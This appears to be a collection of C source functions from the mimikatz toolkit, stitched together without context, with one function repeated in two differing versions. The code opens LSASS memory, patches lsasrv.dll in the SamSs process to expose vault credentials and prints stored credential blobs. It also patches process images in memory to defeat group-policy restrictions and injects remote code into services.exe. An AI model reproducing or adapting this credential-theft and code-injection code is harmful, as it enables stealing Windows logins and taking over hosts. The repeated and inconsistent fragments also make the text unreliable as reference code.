NTSTATUS kuhl_m_process_callbackProcess(int argc, wchar_t * argv[], PKULL_M_MODULE_ENUM_CALLBACK callback) { HANDLE hProcess = NULL; DWORD pid = 0; KULL_M_MEMORY_TYPE type = KULL_M_MEMORY_TYPE_OWN; PKULL_M_MEMORY_HANDLE hMemoryProcess; PCWCHAR szPid; if(kull_m_string_args_byName(argc, argv, L"pid", &szPid, NULL)) { type = KULL_M_MEMORY_TYPE_PROCESS; pid = wcstoul(szPid, NULL, 0); if(!(hProcess = OpenProcess(GENERIC_READ, FALSE, pid))) PRINT_ERROR_AUTO(L"OpenProcess"); } if((type == KULL_M_MEMORY_TYPE_OWN) || hProcess) { if(kull_m_memory_open(type, hProcess, &hMemoryProcess)) { kull_m_process_getVeryBasicModuleInformations(hMemoryProcess, callback, NULL); kull_m_memory_close(hMemoryProcess); } else PRINT_ERROR_AUTO(L"kull_m_memory_open"); if(type = KULL_M_MEMORY_TYPE_PROCESS) CloseHandle(hProcess); } return STATUS_SUCCESS; }
BOOL kull_m_patch_genericProcessOrServiceFromBuild(PKULL_M_PATCH_GENERIC generics, SIZE_T cbGenerics, PCWSTR processOrService, PCWSTR moduleName, BOOL isService) // to do for process // to do callback ! (vault & lsadump) { BOOL result = FALSE; SERVICE_STATUS_PROCESS ServiceStatusProcess; PKULL_M_MEMORY_HANDLE hMemory; KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION iModule; HANDLE hProcess; KULL_M_MEMORY_ADDRESS aPatternMemory = {NULL, &hLocalMemory}, aPatchMemory = {NULL, &hLocalMemory}; KULL_M_MEMORY_SEARCH sMemory; PKULL_M_PATCH_GENERIC currenReferences; if(currenReferences = kull_m_patch_getGenericFromBuild(generics, cbGenerics, MIMIKATZ_NT_BUILD_NUMBER)) { aPatternMemory.address = currenReferences->Search.Pattern; aPatchMemory.address = currenReferences->Patch.Pattern; if(kull_m_service_getUniqueForName(processOrService, &ServiceStatusProcess)) { if(ServiceStatusProcess.dwCurrentState >= SERVICE_RUNNING) { if(hProcess = OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_QUERY_INFORMATION, FALSE, ServiceStatusProcess.dwProcessId)) { if(kull_m_memory_open(KULL_M_MEMORY_TYPE_PROCESS, hProcess, &hMemory)) { if(kull_m_process_getVeryBasicModuleInformationsForName(hMemory, moduleName, &iModule)) { sMemory.kull_m_memoryRange.kull_m_memoryAdress = iModule.DllBase; sMemory.kull_m_memoryRange.size = iModule.SizeOfImage; if(result = kull_m_patch(&sMemory, &aPatternMemory, currenReferences->Search.Length, &aPatchMemory, currenReferences->Patch.Length, currenReferences->Offsets.off0, NULL, 0, NULL, NULL)) kprintf(L"\"%s\" service patched\n", processOrService); else PRINT_ERROR_AUTO(L"kull_m_patch"); } else PRINT_ERROR_AUTO(L"kull_m_process_getVeryBasicModuleInformationsForName"); kull_m_memory_close(hMemory); } } else PRINT_ERROR_AUTO(L"OpenProcess"); } else PRINT_ERROR(L"Service is not running\n"); } else PRINT_ERROR_AUTO(L"kull_m_service_getUniqueForName"); } else PRINT_ERROR(L"Incorrect version in references\n"); return result; }
BOOL kuhl_m_misc_generic_nogpo_patch(PCWSTR commandLine, PWSTR disableString, SIZE_T szDisableString, PWSTR enableString, SIZE_T szEnableString) { BOOL status = FALSE; PEB Peb; PROCESS_INFORMATION processInformation; PIMAGE_NT_HEADERS pNtHeaders; KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aBaseAdress = {NULL, NULL}, aPattern = {disableString, &hLocalMemory}, aPatch = {enableString, &hLocalMemory}; KULL_M_MEMORY_SEARCH sMemory; if(kull_m_process_create(KULL_M_PROCESS_CREATE_NORMAL, commandLine, CREATE_SUSPENDED, NULL, 0, NULL, NULL, NULL, &processInformation, FALSE)) { if(kull_m_memory_open(KULL_M_MEMORY_TYPE_PROCESS, processInformation.hProcess, &aBaseAdress.hMemory)) { if(kull_m_process_peb(aBaseAdress.hMemory, &Peb, FALSE)) { aBaseAdress.address = Peb.ImageBaseAddress; if(kull_m_process_ntheaders(&aBaseAdress, &pNtHeaders)) { sMemory.kull_m_memoryRange.kull_m_memoryAdress.hMemory = aBaseAdress.hMemory; sMemory.kull_m_memoryRange.kull_m_memoryAdress.address = (LPVOID) pNtHeaders->OptionalHeader.ImageBase; sMemory.kull_m_memoryRange.size = pNtHeaders->OptionalHeader.SizeOfImage; if(status = kull_m_patch(&sMemory, &aPattern, szDisableString, &aPatch, szEnableString, 0, NULL, 0, NULL, NULL)) kprintf(L"Patch OK for \'%s\' from \'%s\' to \'%s\' @ %p\n", commandLine, disableString, enableString, sMemory.result); else PRINT_ERROR_AUTO(L"kull_m_patch"); LocalFree(pNtHeaders); } } kull_m_memory_close(aBaseAdress.hMemory); } NtResumeProcess(processInformation.hProcess); CloseHandle(processInformation.hThread); CloseHandle(processInformation.hProcess); } return status; }
BOOL CALLBACK kuhl_m_misc_detours_callback_process(PSYSTEM_PROCESS_INFORMATION pSystemProcessInformation, PVOID pvArg) { HANDLE hProcess; PKULL_M_MEMORY_HANDLE hMemoryProcess; DWORD pid = (DWORD) pSystemProcessInformation->UniqueProcessId; if(pid > 4) { kprintf(L"%wZ (%u)\n", &pSystemProcessInformation->ImageName, pid); if(hProcess = OpenProcess(GENERIC_READ, FALSE, pid)) { if(kull_m_memory_open(KULL_M_MEMORY_TYPE_PROCESS, hProcess, &hMemoryProcess)) { kull_m_process_getVeryBasicModuleInformations(hMemoryProcess, kuhl_m_misc_detours_callback_module, NULL); kull_m_memory_close(hMemoryProcess); } CloseHandle(hProcess); } else PRINT_ERROR_AUTO(L"OpenProcess"); } return TRUE; }
NTSTATUS kuhl_m_sekurlsa_acquireLSA() { NTSTATUS status = STATUS_SUCCESS; KULL_M_MEMORY_TYPE Type; HANDLE hData = NULL; DWORD pid; PMINIDUMP_SYSTEM_INFO pInfos; DWORD processRights = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE; BOOL isError = FALSE; if(!cLsass.hLsassMem) { status = STATUS_NOT_FOUND; if(NT_SUCCESS(lsassLocalHelper->initLocalLib())) { if(pMinidumpName) { Type = KULL_M_MEMORY_TYPE_PROCESS_DMP; kprintf(L"Opening : \'%s\' file for minidump...\n", pMinidumpName); hData = CreateFile(pMinidumpName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL); } else { Type = KULL_M_MEMORY_TYPE_PROCESS; if(kull_m_process_getProcessIdForName(L"lsass.exe", &pid)) hData = OpenProcess(processRights, FALSE, pid); else PRINT_ERROR(L"LSASS process not found (?)\n"); } if(hData && hData != INVALID_HANDLE_VALUE) { if(kull_m_memory_open(Type, hData, &cLsass.hLsassMem)) { if(Type == KULL_M_MEMORY_TYPE_PROCESS_DMP) { if(pInfos = (PMINIDUMP_SYSTEM_INFO) kull_m_minidump_stream(cLsass.hLsassMem->pHandleProcessDmp->hMinidump, SystemInfoStream)) { cLsass.osContext.MajorVersion = pInfos->MajorVersion; cLsass.osContext.MinorVersion = pInfos->MinorVersion; cLsass.osContext.BuildNumber = pInfos->BuildNumber; if(isError = (cLsass.osContext.MajorVersion != MIMIKATZ_NT_MAJOR_VERSION) && !(MIMIKATZ_NT_MAJOR_VERSION >= 6 && cLsass.osContext.MajorVersion == 10)) PRINT_ERROR(L"Minidump pInfos->MajorVersion (%u) != MIMIKATZ_NT_MAJOR_VERSION (%u)\n", pInfos->MajorVersion, MIMIKATZ_NT_MAJOR_VERSION); #ifdef _M_X64 else if(isError = (pInfos->ProcessorArchitecture != PROCESSOR_ARCHITECTURE_AMD64)) PRINT_ERROR(L"Minidump pInfos->ProcessorArchitecture (%u) != PROCESSOR_ARCHITECTURE_AMD64 (%u)\n", pInfos->ProcessorArchitecture, PROCESSOR_ARCHITECTURE_AMD64); #elif defined _M_IX86 else if(isError = (pInfos->ProcessorArchitecture != PROCESSOR_ARCHITECTURE_INTEL)) PRINT_ERROR(L"Minidump pInfos->ProcessorArchitecture (%u) != PROCESSOR_ARCHITECTURE_INTEL (%u)\n", pInfos->ProcessorArchitecture, PROCESSOR_ARCHITECTURE_INTEL); #endif } else { isError = TRUE; PRINT_ERROR(L"Minidump without SystemInfoStream (?)\n"); } } else { cLsass.osContext.MajorVersion = MIMIKATZ_NT_MAJOR_VERSION; cLsass.osContext.MinorVersion = MIMIKATZ_NT_MINOR_VERSION; cLsass.osContext.BuildNumber = MIMIKATZ_NT_BUILD_NUMBER; } if(!isError) { kuhl_m_sekurlsa_livessp_package.isValid = (cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_8); kuhl_m_sekurlsa_tspkg_package.isValid = (cLsass.osContext.MajorVersion >= 6) || (cLsass.osContext.MinorVersion < 2); if(NT_SUCCESS(kull_m_process_getVeryBasicModuleInformations(cLsass.hLsassMem, kuhl_m_sekurlsa_findlibs, NULL)) && kuhl_m_sekurlsa_msv_package.Module.isPresent) { kuhl_m_sekurlsa_dpapi_lsa_package.Module = kuhl_m_sekurlsa_msv_package.Module; if(kuhl_m_sekurlsa_utils_search(&cLsass, &kuhl_m_sekurlsa_msv_package.Module)) { status = lsassLocalHelper->AcquireKeys(&cLsass, &lsassPackages[0]->Module.Informations); if(!NT_SUCCESS(status)) PRINT_ERROR(L"Key import\n"); } else PRINT_ERROR(L"Logon list\n"); } else PRINT_ERROR(L"Modules informations\n"); } } else PRINT_ERROR(L"Memory opening\n"); } else PRINT_ERROR_AUTO(L"Handle on memory"); if(!NT_SUCCESS(status)) { cLsass.hLsassMem = kull_m_memory_close(cLsass.hLsassMem); CloseHandle(hData); } } else PRINT_ERROR(L"Local LSA library failed\n"); } return status; }
NTSTATUS kuhl_m_vault_cred(int argc, wchar_t * argv[]) { DWORD credCount, i; PCREDENTIAL * pCredential = NULL; DWORD flags = 0; UNICODE_STRING creds; SERVICE_STATUS_PROCESS ServiceStatusProcess; PKULL_M_MEMORY_HANDLE hMemory; KULL_M_MEMORY_HANDLE hLocalMemory = { KULL_M_MEMORY_TYPE_OWN, NULL }; KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION iModuleSamSrv; HANDLE hSamSs; KULL_M_MEMORY_ADDRESS aPatternMemory = { NULL, &hLocalMemory }, aPatchMemory = { NULL, &hLocalMemory }; KULL_M_MEMORY_SEARCH sMemory; PKULL_M_PATCH_GENERIC CredpCloneCredentialReference; static BOOL isPatching = FALSE; if (!isPatching && kull_m_string_args_byName(argc, argv, L"patch", NULL, NULL)) { if (CredpCloneCredentialReference = kull_m_patch_getGenericFromBuild(CredpCloneCredentialReferences, sizeof(CredpCloneCredentialReferences) / sizeof(KULL_M_PATCH_GENERIC), MIMIKATZ_NT_BUILD_NUMBER)) { aPatternMemory.address = CredpCloneCredentialReference->Search.Pattern; aPatchMemory.address = CredpCloneCredentialReference->Patch.Pattern; if (kull_m_service_getUniqueForName(L"SamSs", &ServiceStatusProcess)) { if (hSamSs = OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_QUERY_INFORMATION, FALSE, ServiceStatusProcess.dwProcessId)) { if (kull_m_memory_open(KULL_M_MEMORY_TYPE_PROCESS, hSamSs, &hMemory)) { if (kull_m_process_getVeryBasicModuleInformationsForName(hMemory, L"lsasrv.dll", &iModuleSamSrv)) { sMemory.kull_m_memoryRange.kull_m_memoryAdress = iModuleSamSrv.DllBase; sMemory.kull_m_memoryRange.size = iModuleSamSrv.SizeOfImage; isPatching = TRUE; if (!kull_m_patch(&sMemory, &aPatternMemory, CredpCloneCredentialReference->Search.Length, &aPatchMemory, CredpCloneCredentialReference->Patch.Length, CredpCloneCredentialReference->Offsets.off0, kuhl_m_vault_cred, argc, argv, NULL)) PRINT_ERROR_AUTO(L"kull_m_patch"); isPatching = FALSE; } else PRINT_ERROR_AUTO(L"kull_m_process_getVeryBasicModuleInformationsForName"); kull_m_memory_close(hMemory); } } else PRINT_ERROR_AUTO(L"OpenProcess"); } else PRINT_ERROR_AUTO(L"kull_m_service_getUniqueForName"); } } else { do { if (CredEnumerate(NULL, flags, &credCount, &pCredential)) { for (i = 0; i < credCount; i++) { kprintf(L"TargetName : %s / %s\n" L"UserName : %s\n" L"Comment : %s\n" L"Type : %u - %s\n" L"Credential : ", pCredential[i]->TargetName ? pCredential[i]->TargetName : L"<NULL>", pCredential[i]->TargetAlias ? pCredential[i]->TargetAlias : L"<NULL>", pCredential[i]->UserName ? pCredential[i]->UserName : L"<NULL>", pCredential[i]->Comment ? pCredential[i]->Comment : L"<NULL>", pCredential[i]->Type, (pCredential[i]->Type < CRED_TYPE_MAXIMUM) ? CredTypeToStrings[pCredential[i]->Type] : L"? (type > CRED_TYPE_MAXIMUM)" ); creds.Buffer = (PWSTR)pCredential[i]->CredentialBlob; creds.Length = creds.MaximumLength = (USHORT)pCredential[i]->CredentialBlobSize; if (kull_m_string_suspectUnicodeString(&creds)) kprintf(L"%wZ", &creds); else kull_m_string_wprintf_hex(pCredential[i]->CredentialBlob, pCredential[i]->CredentialBlobSize, 1); kprintf(L"\n\n"); } CredFree(pCredential); } flags++; } while ((flags <= CRED_ENUMERATE_ALL_CREDENTIALS) && (MIMIKATZ_NT_MAJOR_VERSION > 5)); } return STATUS_SUCCESS; }
NTSTATUS kuhl_m_minesweeper_infos(int argc, wchar_t * argv[]) { DWORD dwPid, r, c; HANDLE hProcess; PEB Peb; PIMAGE_NT_HEADERS pNtHeaders; PVOID G = NULL; STRUCT_MINESWEEPER_GAME Game; STRUCT_MINESWEEPER_BOARD Board; KULL_M_MEMORY_SEARCH sMemory = {{{NULL, NULL}, 0}, NULL}; KULL_M_MEMORY_ADDRESS aRemote = {NULL, NULL}, aBuffer = {PTRN_WIN6_Game_SafeGetSingleton, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}; BOOL bAlloc = FALSE; LONG offsetTemp = 0; CHAR ** field = NULL; if(kull_m_process_getProcessIdForName(L"minesweeper.exe", &dwPid)) { if(hProcess = OpenProcess(PROCESS_VM_READ | PROCESS_VM_OPERATION | PROCESS_QUERY_INFORMATION, FALSE, dwPid)) { if(kull_m_memory_open(KULL_M_MEMORY_TYPE_PROCESS, hProcess, &aRemote.hMemory)) { if(kull_m_process_peb(aRemote.hMemory, &Peb, FALSE)) { aRemote.address = Peb.ImageBaseAddress; if(kull_m_process_ntheaders(&aRemote, &pNtHeaders)) { sMemory.kull_m_memoryRange.kull_m_memoryAdress.hMemory = aRemote.hMemory; sMemory.kull_m_memoryRange.kull_m_memoryAdress.address = (LPVOID) pNtHeaders->OptionalHeader.ImageBase; sMemory.kull_m_memoryRange.size = pNtHeaders->OptionalHeader.SizeOfImage; if(kull_m_memory_search(&aBuffer, sizeof(PTRN_WIN6_Game_SafeGetSingleton), &sMemory, TRUE)) { aRemote.address = (PBYTE) sMemory.result + OFFS_WIN6_ToG; #ifdef _M_X64 aBuffer.address = &offsetTemp; if(kull_m_memory_copy(&aBuffer, &aRemote, sizeof(LONG))) { aRemote.address = (PBYTE) aRemote.address + 1 + sizeof(LONG) + offsetTemp; #elif defined _M_IX86 aBuffer.address = &aRemote.address; if(kull_m_memory_copy(&aBuffer, &aRemote, sizeof(PVOID))) { #endif aBuffer.address = &G; if(kull_m_memory_copy(&aBuffer, &aRemote, sizeof(PVOID))) { aRemote.address = G; aBuffer.address = &Game; if(kull_m_memory_copy(&aBuffer, &aRemote, sizeof(STRUCT_MINESWEEPER_GAME))) { #ifdef _M_IX86 if(MIMIKATZ_NT_BUILD_NUMBER >= KULL_M_WIN_MIN_BUILD_7) Game.pBoard = Game.pBoard_WIN7x86; #endif aRemote.address = Game.pBoard; aBuffer.address = &Board; if(kull_m_memory_copy(&aBuffer, &aRemote, sizeof(STRUCT_MINESWEEPER_BOARD))) { kprintf(L"Field : %u r x %u c\nMines : %u\n\n", Board.cbRows, Board.cbColumns, Board.cbMines); if(field = (CHAR **) LocalAlloc(LPTR, sizeof(CHAR *) * Board.cbRows)) { for(r = 0, bAlloc = TRUE; (r < Board.cbRows) && bAlloc; r++) { if(field[r] = (CHAR *) LocalAlloc(LPTR, sizeof(CHAR) * Board.cbColumns)) bAlloc &= TRUE; else PRINT_ERROR(L"Memory C (R = %u)\n", r); } } else PRINT_ERROR(L"Memory R\n"); if(bAlloc) { kuhl_m_minesweeper_infos_parseField(aRemote.hMemory, Board.ref_visibles, field, TRUE); kuhl_m_minesweeper_infos_parseField(aRemote.hMemory, Board.ref_mines, field, FALSE); for(r = 0; r < Board.cbRows; r++) { kprintf(L"\t"); for(c = 0; c < Board.cbColumns; c++) kprintf(L"%C ", field[r][c]); kprintf(L"\n"); } } if(field) { for(r = 0; r < Board.cbRows; r++) { if(field[r]) LocalFree(field[r]); } LocalFree(field); } } else PRINT_ERROR(L"Board copy\n"); } else PRINT_ERROR(L"Game copy\n"); } else PRINT_ERROR(L"G copy\n"); } else PRINT_ERROR(L"Global copy\n"); } else PRINT_ERROR(L"Search is KO\n"); LocalFree(pNtHeaders); } else PRINT_ERROR(L"Minesweeper NT Headers\n"); } else PRINT_ERROR(L"Minesweeper PEB\n"); kull_m_memory_close(aRemote.hMemory); } CloseHandle(hProcess); } else PRINT_ERROR_AUTO(L"OpenProcess"); } else PRINT_ERROR(L"No MineSweeper in memory!\n"); return STATUS_SUCCESS; } void kuhl_m_minesweeper_infos_parseField(PKULL_M_MEMORY_HANDLE hMemory, PSTRUCT_MINESWEEPER_REF_ELEMENT base, CHAR ** field, BOOL isVisible) { STRUCT_MINESWEEPER_REF_ELEMENT ref_first_element; PSTRUCT_MINESWEEPER_REF_ELEMENT * ref_columns_elements; STRUCT_MINESWEEPER_REF_ELEMENT ref_column_element; DWORD c, r, szFinalElement = isVisible ? sizeof(DWORD) : sizeof(BYTE); KULL_M_MEMORY_ADDRESS aRemote = {base, hMemory}, aLocal = {&ref_first_element, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}; if(kull_m_memory_copy(&aLocal, &aRemote, sizeof(STRUCT_MINESWEEPER_REF_ELEMENT))) { if(ref_columns_elements = (PSTRUCT_MINESWEEPER_REF_ELEMENT *) LocalAlloc(LPTR, sizeof(PSTRUCT_MINESWEEPER_REF_ELEMENT) * ref_first_element.cbElements)) { aLocal.address = ref_columns_elements; aRemote.address = ref_first_element.elements; if(kull_m_memory_copy(&aLocal, &aRemote, ref_first_element.cbElements * sizeof(PSTRUCT_MINESWEEPER_REF_ELEMENT))) { for(c = 0; c < ref_first_element.cbElements; c++) { aLocal.address = &ref_column_element; aRemote.address = ref_columns_elements[c]; if(kull_m_memory_copy(&aLocal, &aRemote, sizeof(STRUCT_MINESWEEPER_REF_ELEMENT))) { if(aLocal.address = LocalAlloc(LPTR, szFinalElement * ref_column_element.cbElements)) { aRemote.address = ref_column_element.elements; if(kull_m_memory_copy(&aLocal, &aRemote, szFinalElement * ref_column_element.cbElements)) { for(r = 0; r < ref_column_element.cbElements; r++) { if(isVisible) field[r][c] = DISP_MINESWEEPER[((DWORD *)(aLocal.address))[r]]; else if(((BYTE *)(aLocal.address))[r]) field[r][c] = '*'; } } else PRINT_ERROR(L"Unable to read elements from column: %u\n", c); LocalFree(aLocal.address); } } else PRINT_ERROR(L"Unable to read references from column: %u\n", c); } } else PRINT_ERROR(L"Unable to read references\n"); LocalFree(ref_columns_elements); } } else PRINT_ERROR(L"Unable to read first element\n"); }
NTSTATUS kuhl_m_vault_cred(int argc, wchar_t * argv[]) { DWORD credCount, i, j; PCREDENTIAL * pCredential = NULL; DWORD flags = 0; SERVICE_STATUS_PROCESS ServiceStatusProcess; PKULL_M_MEMORY_HANDLE hMemory; KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION iModuleSamSrv; HANDLE hSamSs; KULL_M_MEMORY_ADDRESS aPatternMemory = {NULL, &hLocalMemory}, aPatchMemory = {NULL, &hLocalMemory}; KULL_M_MEMORY_SEARCH sMemory; PKULL_M_PATCH_GENERIC CredpCloneCredentialReference; static BOOL isPatching = FALSE; if(!isPatching && kull_m_string_args_byName(argc, argv, L"patch", NULL, NULL)) { if(CredpCloneCredentialReference = kull_m_patch_getGenericFromBuild(CredpCloneCredentialReferences, ARRAYSIZE(CredpCloneCredentialReferences), MIMIKATZ_NT_BUILD_NUMBER)) { aPatternMemory.address = CredpCloneCredentialReference->Search.Pattern; aPatchMemory.address = CredpCloneCredentialReference->Patch.Pattern; if(kull_m_service_getUniqueForName(L"SamSs", &ServiceStatusProcess)) { if(hSamSs = OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_QUERY_INFORMATION, FALSE, ServiceStatusProcess.dwProcessId)) { if(kull_m_memory_open(KULL_M_MEMORY_TYPE_PROCESS, hSamSs, &hMemory)) { if(kull_m_process_getVeryBasicModuleInformationsForName(hMemory, L"lsasrv.dll", &iModuleSamSrv)) { sMemory.kull_m_memoryRange.kull_m_memoryAdress = iModuleSamSrv.DllBase; sMemory.kull_m_memoryRange.size = iModuleSamSrv.SizeOfImage; isPatching = TRUE; if(!kull_m_patch(&sMemory, &aPatternMemory, CredpCloneCredentialReference->Search.Length, &aPatchMemory, CredpCloneCredentialReference->Patch.Length, CredpCloneCredentialReference->Offsets.off0, kuhl_m_vault_cred, argc, argv, NULL)) PRINT_ERROR_AUTO(L"kull_m_patch"); isPatching = FALSE; } else PRINT_ERROR_AUTO(L"kull_m_process_getVeryBasicModuleInformationsForName"); kull_m_memory_close(hMemory); } } else PRINT_ERROR_AUTO(L"OpenProcess"); } else PRINT_ERROR_AUTO(L"kull_m_service_getUniqueForName"); } } else { do { if(CredEnumerate(NULL, flags, &credCount, &pCredential)) { for(i = 0; i < credCount; i++) { kprintf(L"TargetName : %s / %s\n" L"UserName : %s\n" L"Comment : %s\n" L"Type : %u - %s\n" L"Persist : %u - %s\n" L"Flags : %08x\n", pCredential[i]->TargetName ? pCredential[i]->TargetName : L"<NULL>", pCredential[i]->TargetAlias ? pCredential[i]->TargetAlias : L"<NULL>", pCredential[i]->UserName ? pCredential[i]->UserName : L"<NULL>", pCredential[i]->Comment ? pCredential[i]->Comment : L"<NULL>", pCredential[i]->Type, kull_m_cred_CredType(pCredential[i]->Type), pCredential[i]->Persist, kull_m_cred_CredPersist(pCredential[i]->Persist), pCredential[i]->Flags ); kprintf(L"Credential : "); kull_m_string_printSuspectUnicodeString(pCredential[i]->CredentialBlob, pCredential[i]->CredentialBlobSize); kprintf(L"\n" L"Attributes : %u\n", pCredential[i]->AttributeCount ); if(kull_m_string_args_byName(argc, argv, L"attributes", NULL, NULL)) { for(j = 0; j < pCredential[i]->AttributeCount; j++) { kprintf(L" [%2u] Attribute\n", j); kprintf(L" Flags : %08x - %u\n", pCredential[i]->Attributes[j].Flags, pCredential[i]->Attributes[j].Flags); kprintf(L" Keyword : %s\n", pCredential[i]->Attributes[j].Keyword); kprintf(L" Value : "); kull_m_string_printSuspectUnicodeString(pCredential[i]->Attributes[j].Value, pCredential[i]->Attributes[j].ValueSize); kprintf(L"\n"); } } kprintf(L"\n"); } CredFree(pCredential); } flags++; } while((flags <= CRED_ENUMERATE_ALL_CREDENTIALS) && (MIMIKATZ_NT_MAJOR_VERSION > 5)); } return STATUS_SUCCESS; }
BOOL kuhl_service_sendcontrol_inprocess(PWSTR ServiceName, DWORD dwControl) { BOOL status = FALSE; DWORD processId, szCode; PVOID pCode; HANDLE hProcess; KULL_M_MEMORY_ADDRESS aRemoteFunc; KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}; KULL_M_MEMORY_SEARCH sMemory; PKULL_M_PATCH_GENERIC currentReference; PEB Peb; PIMAGE_NT_HEADERS pNtHeaders; PREMOTE_LIB_INPUT_DATA iData; REMOTE_LIB_OUTPUT_DATA oData; if(kull_m_process_getProcessIdForName(L"services.exe", &processId)) { if(hProcess = OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_QUERY_INFORMATION | PROCESS_CREATE_THREAD, FALSE, processId)) { if(kull_m_memory_open(KULL_M_MEMORY_TYPE_PROCESS, hProcess, &sMemory.kull_m_memoryRange.kull_m_memoryAdress.hMemory)) { if(!pScSendControl) { if(kull_m_process_peb(sMemory.kull_m_memoryRange.kull_m_memoryAdress.hMemory, &Peb, FALSE)) { sMemory.kull_m_memoryRange.kull_m_memoryAdress.address = Peb.ImageBaseAddress; if(kull_m_process_ntheaders(&sMemory.kull_m_memoryRange.kull_m_memoryAdress, &pNtHeaders)) { sMemory.kull_m_memoryRange.kull_m_memoryAdress.address = (LPVOID) pNtHeaders->OptionalHeader.ImageBase; sMemory.kull_m_memoryRange.size = pNtHeaders->OptionalHeader.SizeOfImage; if(currentReference = kull_m_patch_getGenericFromBuild(ScSendControlReferences, ARRAYSIZE(ScSendControlReferences), MIMIKATZ_NT_BUILD_NUMBER)) { aLocalMemory.address = currentReference->Search.Pattern; if(kull_m_memory_search(&aLocalMemory, currentReference->Search.Length, &sMemory, FALSE)) pScSendControl = (PBYTE) sMemory.result + currentReference->Offsets.off0; else PRINT_ERROR_AUTO(L"kull_m_memory_search"); } LocalFree(pNtHeaders); } } } if(pScSendControl) { if(MIMIKATZ_NT_BUILD_NUMBER < KULL_M_WIN_BUILD_8) { szCode = (DWORD) ((PBYTE) kuhl_service_sendcontrol_std_thread_end - (PBYTE) kuhl_service_sendcontrol_std_thread); pCode = kuhl_service_sendcontrol_std_thread; } else { szCode = (DWORD) ((PBYTE) kuhl_service_sendcontrol_fast_thread_end - (PBYTE) kuhl_service_sendcontrol_fast_thread); pCode = kuhl_service_sendcontrol_fast_thread; } if(kull_m_remotelib_CreateRemoteCodeWitthPatternReplace(sMemory.kull_m_memoryRange.kull_m_memoryAdress.hMemory, pCode, szCode, NULL, &aRemoteFunc)) { if(iData = kull_m_remotelib_CreateInput(pScSendControl, dwControl, (DWORD) (wcslen(ServiceName) + 1) * sizeof(wchar_t), ServiceName)) { if(kull_m_remotelib_create(&aRemoteFunc, iData, &oData)) { if(oData.outputStatus) kprintf(L"error %u\n", oData.outputStatus); else kprintf(L"OK!\n"); } else PRINT_ERROR_AUTO(L"kull_m_remotelib_create"); LocalFree(iData); } kull_m_memory_free(&aRemoteFunc, 0); } else PRINT_ERROR(L"kull_m_remotelib_CreateRemoteCodeWitthPatternReplace\n"); } else PRINT_ERROR(L"Not available without ScSendControl\n"); kull_m_memory_close(sMemory.kull_m_memoryRange.kull_m_memoryAdress.hMemory); } CloseHandle(hProcess); } else PRINT_ERROR_AUTO(L"OpenProcess"); } return status; }